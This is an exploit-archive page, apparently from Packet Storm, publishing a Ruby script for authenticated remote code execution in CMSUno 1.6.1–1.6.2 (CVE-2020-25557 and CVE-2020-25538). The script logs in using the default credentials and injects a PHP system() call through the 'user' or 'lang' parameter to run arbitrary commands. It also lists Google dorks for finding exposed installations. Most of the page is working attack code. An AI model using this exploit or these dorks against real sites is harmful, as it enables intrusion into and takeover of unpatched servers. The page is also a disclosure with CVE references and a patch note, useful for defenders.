CMSUno 1.6.2 Remote Code Execution

CMSUno 1.6.2 Remote Code Execution: Posted Jan 28, 2021; Authored by Alexandre Zanni; CMSUno version 1.6.2 authenticated remote code execution exploit. The original discovery for the vulnerability leveraged is attributed to Fatih Celik in November of 2020.; tags | exploit, remote, code execution; advisories | CVE-2020-25538, CVE-2020-25557; SHA-256 | 2477146e721d33c19e7c9e103dfd83b0cfc4343413f007eb0260e88e64259065; Download | Favorite | View

CMSUno 1.6.2 Remote Code Execution

#!/usr/bin/env ruby

# Exploit
## Title: CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)
## Google Dorks:
##   inurl:uno/central.php
##   inurl:uno/config.php
##   inurl:uno.php intitle:"CMSUno - Login"
## Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr)
## Author website: https://pwn.by/noraj/
## Date: 2021-01-15
## Vendor Homepage: https://www.boiteasite.fr/cmsuno.html
## Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz
## Version: 1.6.1, 1.6.2
## Tested on: Bludit
## - 1.6.3 ❌
## - 1.6.2 ✅
## - 1.6.1 ✅
## - 1.6.0 ❌
## - 1.5.7 ❌
## Patch: Update to 1.6.3

# Vulnerabilities
## Discoverer: Fatih Çelik
## Date: 2020/09/30
## Discoverer website: https://fatihhcelik.blogspot.com
## Discovered on CMSUno 1.6.2 and tested on Kali Linux 2020.2
## Vulnerability 1:
##   Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
##   CVE: CVE-2020-25557
##   References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html
## Vulnerability 2:
##   Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
##   CVE: CVE-2020-25538
##   References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html

require 'httpclient'
require 'docopt'

# username = 'cmsuno'
# password = '654321'
# root_url = 'http://localhost:5000/'
# command = 'pwd'

doc = <<~DOCOPT
  CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)

  Usage:
    #{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug]
    #{__FILE__} -H | --help

  Options:
    -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
    -u <username>, --user <username>      user name (if not default: cmsuno)
    -p <password>, --pass <password>      User password (if not default: 654321)
    -c <cmd>, --command <cmd>             Command to execute on the target
    -t <tehc>, --technique <tech>         Technique: exploiting 'user' param (default, with output) or 'lang' param (blind)
    --debug                               Display arguments
    -h, --help                            Show this screen

  Examples:
    #{__FILE__} -r http://example.org -c id
    #{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang
DOCOPT

# Get anti-CSRF token
def get_unox(client, auth_status)
  print '[*] Fetching anti-CSRF token: '
  res = client.get(LOGIN_URL)
  case auth_status
  when false
    regexp = /name="unox" value="([a-f0-9]{32}?)"/
  when true
    regexp = /Unox='([a-f0-9]{32}?)'/
  end
  token = regexp.match(res.body).captures[0].chomp
  puts token
  return token
end

def login(client, user, pass)
  data = {
    'unox' => get_unox(client, false),
    'user' => user,
    'pass' => pass,
  }
  puts '[*] Logging in'
  res = client.post(LOGIN_URL, data)
  return res.body
end

def exploit(client, user, pass, cmd, tech)
  payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// "
  case tech
  when 'user'
    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en"
  when 'lang'
    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}"
  else
    raise 'Wrong exploitation technique argument value'
  end
  headers = {
    'X-Requested-With' => 'XMLHttpRequest'
  }
  #client.proxy = 'http://localhost:8080'
  puts "[*] Starting exploitation, using '#{tech}' param technique"
  client.post(VULNERABLE_URL, data, headers)
  # Login again to trigger uno/password.php
  clnt2 = HTTPClient.new
  return login(clnt2, user, pass).lines[..-2].join
end

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']

  username = args['--user'] || 'cmsuno'
  password = args['--pass'] || '654321'
  technique = args['--technique'] || 'user'
  LOGIN_URL = "#{args['--root-url']}/uno.php"
  VULNERABLE_URL = "#{args['--root-url']}/uno/central.php"

  clnt = HTTPClient.new
  login(clnt, username, password)
  output = exploit(clnt, username, password, args['--command'], technique)
  print '[*] Command output:'
  case technique
  when 'user'
    puts "\n#{output}"
  when 'lang'
    puts ' blind RCE, no output with this exploitation technique'
  end
rescue Docopt::Exit => e
  puts e.message
end

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

CMSUno 1.6.2 Remote Code Execution

CMSUno 1.6.2 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CMSUno 1.6.2 Remote Code Execution

Share This

CMSUno 1.6.2 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems